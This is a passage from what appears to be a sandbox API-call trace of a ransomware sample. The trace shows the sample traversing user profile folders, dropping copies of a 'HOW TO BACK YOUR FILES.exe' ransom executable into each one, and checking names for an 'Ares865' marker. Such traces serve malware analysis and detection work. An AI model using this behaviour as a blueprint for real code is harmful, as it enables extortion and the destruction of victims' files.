out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.441] CloseHandle (hObject=0x118) returned 1 [0042.442] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.442] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.442] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.442] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.442] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.442] lstrcpyW (in: lpString1=0x2e2e94a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.442] lstrlenW (lpString="desktop.ini") returned 11 [0042.442] lstrlenW (lpString="Ares865") returned 7 [0042.442] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.442] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.442] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.442] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0042.442] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned 116 [0042.442] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.442] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.442] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.443] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.443] GetLastError () returned 0x0 [0042.443] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.443] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.443] CloseHandle (hObject=0x118) returned 1 [0042.443] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.443] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.443] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.443] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.443] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.443] lstrcpyW (in: lpString1=0x2e2e94a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.443] lstrlenW (lpString="desktop.ini") returned 11 [0042.443] lstrlenW (lpString="Ares865") returned 7 [0042.444] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.444] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft" [0042.444] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb3b8 | out: hHeap=0x2b0000) returned 1 [0042.444] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0042.444] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft") returned 80 [0042.444] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft" [0042.444] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.444] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.444] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.444] GetLastError () returned 0x0 [0042.444] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.444] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.444] CloseHandle (hObject=0x118) returned 1 [0042.445] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.445] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.445] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.445] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.445] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.445] lstrcpyW (in: lpString1=0x2e2e902, lpString2="Credentials" | out: lpString1="Credentials") returned="Credentials" [0042.445] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0042.445] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xba) returned 0x2cba28 [0042.445] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2388 | out: ListHead=0x2e77d0, ListEntry=0x2d2388) returned 0x2d2368 [0042.445] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0042.445] lstrcmpiW (lpString1="Feeds", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.445] lstrcmpiW (lpString1="Feeds", lpString2="aoldtz.exe") returned 1 [0042.445] lstrcpyW (in: lpString1=0x2e2e902, lpString2="Feeds" | out: lpString1="Feeds") returned="Feeds" [0042.445] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0042.445] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xae) returned 0x2cb3b8 [0042.445] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0042.445] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0042.445] lstrcmpiW (lpString1="Feeds Cache", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.445] lstrcmpiW (lpString1="Feeds Cache", lpString2="aoldtz.exe") returned 1 [0042.445] lstrcpyW (in: lpString1=0x2e2e902, lpString2="Feeds Cache" | out: lpString1="Feeds Cache") returned="Feeds Cache" [0042.445] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0042.445] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xba) returned 0x2cbaf0 [0042.445] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0042.446] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a6392c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.446] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.446] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0042.446] lstrcmpiW (lpString1="Internet Explorer", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.446] lstrcmpiW (lpString1="Internet Explorer", lpString2="aoldtz.exe") returned 1 [0042.446] lstrcpyW (in: lpString1=0x2e2e902, lpString2="Internet Explorer" | out: lpString1="Internet Explorer") returned="Internet Explorer" [0042.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0042.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc6) returned 0x2cbdb0 [0042.446] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23e8 | out: ListHead=0x2e77d0, ListEntry=0x2d23e8) returned 0x2d23c8 [0042.446] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0042.446] lstrcmpiW (lpString1="Media Player", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.446] lstrcmpiW (lpString1="Media Player", lpString2="aoldtz.exe") returned 1 [0042.446] lstrcpyW (in: lpString1=0x2e2e902, lpString2="Media Player" | out: lpString1="Media Player") returned="Media Player" [0042.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xbc) returned 0x2cbe80 [0042.446] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.446] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66d8860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4d1d5e4e, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0042.446] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.446] lstrcmpiW (lpString1="Windows", lpString2="aoldtz.exe") returned 1 [0042.446] lstrcpyW (in: lpString1=0x2e2e902, lpString2="Windows Mail" | out: lpString1="Windows Mail") returned="Windows Mail" [0042.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0042.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xbc) returned 0x2cbf48 [0042.446] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2428 | out: ListHead=0x2e77d0, ListEntry=0x2d2428) returned 0x2d2408 [0042.446] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0042.446] lstrcmpiW (lpString1="Windows Media", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.446] lstrcmpiW (lpString1="Windows Media", lpString2="aoldtz.exe") returned 1 [0042.446] lstrcpyW (in: lpString1=0x2e2e902, lpString2="Windows Media" | out: lpString1="Windows Media") returned="Windows Media" [0042.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2440 [0042.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xbe) returned 0x2cc010 [0042.446] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2448 | out: ListHead=0x2e77d0, ListEntry=0x2d2448) returned 0x2d2428 [0042.446] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0042.447] lstrcmpiW (lpString1="Windows Sidebar", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.447] lstrcmpiW (lpString1="Windows Sidebar", lpString2="aoldtz.exe") returned 1 [0042.447] lstrcpyW (in: lpString1=0x2e2e902, lpString2="Windows Sidebar" | out: lpString1="Windows Sidebar") returned="Windows Sidebar" [0042.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2460 [0042.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc2) returned 0x2cc0d8 [0042.447] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2468 | out: ListHead=0x2e77d0, ListEntry=0x2d2468) returned 0x2d2448 [0042.447] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0042.447] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.447] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2468 [0042.447] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0042.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc0d8 | out: hHeap=0x2b0000) returned 1 [0042.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0042.447] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned 96 [0042.447] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0042.447] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.447] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.448] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.448] GetLastError () returned 0x0 [0042.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.448] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.448] CloseHandle (hObject=0x118) returned 1 [0042.448] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.448] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.448] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.448] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.448] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.448] lstrcpyW (in: lpString1=0x2e2e922, lpString2="Gadgets" | out: lpString1="Gadgets") returned="Gadgets" [0042.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2460 [0042.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd2) returned 0x2cc0d8 [0042.448] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2468 | out: ListHead=0x2e77d0, ListEntry=0x2d2468) returned 0x2d2448 [0042.448] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.448] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.448] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings.ini", cAlternateFileName="")) returned 1 [0042.448] lstrcmpiW (lpString1="Settings.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.449] lstrcmpiW (lpString1="Settings.ini", lpString2="aoldtz.exe") returned 1 [0042.449] lstrcpyW (in: lpString1=0x2e2e922, lpString2="Settings.ini" | out: lpString1="Settings.ini") returned="Settings.ini" [0042.449] lstrlenW (lpString="Settings.ini") returned 12 [0042.449] lstrlenW (lpString="Ares865") returned 7 [0042.449] lstrcmpiW (lpString1="ngs.ini", lpString2="Ares865") returned 1 [0042.449] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc0d8 | out: hHeap=0x2b0000) returned 1 [0042.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0042.449] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned 104 [0042.449] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.449] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.449] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.449] 